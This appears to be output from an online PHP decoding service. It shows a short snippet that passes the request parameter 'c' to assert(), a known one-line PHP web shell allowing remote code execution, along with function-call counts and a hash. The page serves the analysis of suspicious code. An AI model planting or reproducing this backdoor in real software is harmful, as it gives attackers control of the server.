Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function abc($x){ @assert($x); } abc($_REQUEST['c']); ?>..

Decoded Output download

<?php 
function abc($x){ 
@assert($x); 
} 
abc($_REQUEST['c']); 
?>

Did this file decode correctly?

Original Code

<?php
function abc($x){
@assert($x);
}
abc($_REQUEST['c']);
?>

Function Calls

abc 1
assert 1

Variables

$x None

Stats

MD5 c38d1785a803f50f8bd26c9cf87780b8
Eval Count 0
Decode Time 118 ms